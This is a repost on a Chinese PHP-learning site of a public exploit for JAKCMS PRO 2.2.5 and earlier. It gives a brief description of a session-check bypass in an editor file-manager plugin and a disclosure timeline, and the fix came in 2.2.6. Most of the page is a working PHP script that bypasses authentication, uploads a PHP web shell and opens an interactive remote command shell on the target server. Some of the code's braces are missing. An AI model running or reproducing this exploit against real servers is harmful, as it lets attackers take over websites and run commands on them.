网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

JAKCMS PRO <= 2.2.5远程任意文件上传漏洞及修复

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题: JAKCMS PRO = 2.2.5 Remote Arbitrary File Upload Exploit作者: EgiX下载地址: http://www.jakcms.com/影响版本n: 2.2.5测试平台: Windows 7 and Debian 6.0.2?php/* --------------......

 

标题: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit 

 

作者: EgiX 

下载地址: http://www.jakcms.com/ 

影响版本n: 2.2.5 

测试平台: Windows 7 and Debian 6.0.2 

<?php 

/* 

    -------------------------------------------------------- 

    JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit 

    -------------------------------------------------------- 

    author..........: EgiX 

    mail............: n0b0d13s[at]gmail[dot]com 

    software link...: http://www.jakcms.com/ 

    This PoC was written for educational purpose. Use it at your own risk. 

 

    Author will be not responsible for any damage. 

 

    [-] vulnerable code in /js/editor/plugins/jakadminexplorer/php/session.php 

 

    119.    if ($SESSION["check_session_variable"] != "") { 

    120.     

    121.        // Session Starten 

   122.        session_start(); 

    123.     

    124.        // Session-Variable überprüfen 

125.        if (!isset($_SESSION[$SESSION["check_session_variable"]])) { 

www.2cto.com

 

    126.            include("error.php"); 

    127.            die; 

 

    128.        } 

 

    129.    } 

    This authentication schema could be bypassed due to an attacker might be able to start a session accessing to /index.php that set 

 

     for e.g. the "jak_lastURL" session variable, so could be set $SESSION["check_session_variable"] to bypass the check at line 125. 

    Successful exploitation allows attackers access to plugins functionality (see /js/editor/plugins/jakadminexplorer/php/action.php), 

    in this way an attacker could be able to "delete", "create", "rename" any folder/file into webserver or upload arbitrary files. 

 

    The same vulnerability afflicts also jakadminimage, jakusrexplorer and jakusrimage plugins.  

 

    [-] Disclosure timeline: 

    [15/09/2011] - Vulnerability discovered 

    [16/09/2011] - Issue reported to http://www.jakcms.com/tracker/t/61/security-flaw-imagefilemanager 

 

    [16/09/2011] - Vendor fix released in version 2.2.6 

    [21/09/2011] - Public disclosure 

 

*/

error_reporting(0); 

set_time_limit(0); 

ini_set("default_socket_timeout", 5); 

function http_send($host, $packet) 

    if (!($sock = fsockopen($host, 80))) 

      die("\n[-] No response from {$host}:80\n"); 

    fputs($sock, $packet); 

    return stream_get_contents($sock); 

 

 

function RC4($data) 

 

  

 

 

  

 

    $key = "asvKHQFkoobdwdin4bi30xzb003ufkxS3Fu3HArhBnlIk5pr3D6OGSKvUbso1rtne42VekxwUmOtPgmcA1iYC6lrpWP7HXq6VdB8EnbzR0L8rIHMqSY8mIi0o3ROzZWe"; 

 

  

 

    $s = range(0, 256); 

 

  

 

    $j = 0; 

    for ($i = 0; $i < 256; $i++) 

 

    { 

        $j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256; 

      $x = $s[$i]; 

       $s[$i] = $s[$j]; 

        $s[$j] = $x; 

    } 

    $i = $j = 0; 

    $ct = ""; 

    for ($y = 0; $y < strlen($data); $y++) 

 

     { 

      $i = ($i + 1) % 256; 

        $j = ($j + $s[$i]) % 256; 

 

        $x = $s[$i]; 

        $s[$i] = $s[$j]; 

       $s[$j] = $x; 

      $ct .= $data[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]); 

    } 

    return $ct; 

 

  

 

 

  

 

  

 

  

 

print "\n+------------------------------------------------------------------+"; 

 

  

 

print "\n| JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit by EgiX |"; 

 

  

 

print "\n+------------------------------------------------------------------+\n"; 

 

if ($argc < 3) 

 

  

 

 

  

 

    print "\nUsage......: php $argv[0] <host> <path>\n"; 

 

  

 

    print "\nExample....: php $argv[0] localhost /"; 

 

  

 

    print "\nExample....: php $argv[0] localhost /jakcms/\n"; 

  die(); 

$host = $argv[1]; 

 

$path = $argv[2]; 

 

$packet  = "GET {$path} HTTP/1.0\r\n"; 

 

  

 

$packet .= "Host: {$host}\r\n"; 

 

  

 

$packet .= "Connection: close\r\n\r\n"; 

preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m); 

 

 

$sid = $m[1]; 

 

  

 

  

 

  

 

$payload  = "--o0oOo0o\r\n"; 

 

  

 

$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n"; 

 

  

 

$payload .= "--o0oOo0o\r\n"; 

 

  

 

$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n"; 

 

$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n"; 

 

$payload .= "--o0oOo0o--\r\n"; 

 

  

 

  

 

  

 

$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh")); 

 

$packet  = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n"; 

 

$packet .= "Host: {$host}\r\n"; 

 

$packet .= "Cookie: PHPSESSID={$sid}\r\n"; 

 

  

 

$packet .= "Content-Length: ".strlen($payload)."\r\n"; 

 

  

 

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; 

 

$packet .= "Connection: close\r\n\r\n"; 

 

$packet .= $payload; 

 

if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n"); 

$packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n"; 

 

$packet .= "Host: {$host}\r\n"; 

 

  

 

$packet .= "Cmd: %s\r\n"; 

 

$packet .= "Connection: close\r\n\r\n"; 

 

  

 

      

 

  

 

while(1) 

 

  

 

  print "\njakcms-shell# "; 

 

  

 

    if (($cmd = trim(fgets(STDIN))) == "exit") break; 

 

  

 

    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); 

 

  

 

?>

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论